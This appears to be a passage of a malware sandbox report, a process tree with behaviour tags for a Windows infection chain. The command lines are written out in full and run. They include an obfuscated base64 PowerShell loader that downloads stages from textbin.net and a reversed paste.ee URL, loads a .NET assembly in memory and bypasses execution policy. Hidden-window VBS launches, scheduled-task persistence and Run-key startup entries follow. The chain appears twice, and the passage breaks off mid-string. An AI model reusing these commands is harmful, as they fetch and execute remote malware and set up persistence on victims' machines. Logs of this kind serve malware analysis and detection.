'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        
        PID:4468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:1820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:2456
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5144
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2428
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5068
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3600
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:6104
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:6112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:1288
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5668
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2088
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3212
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6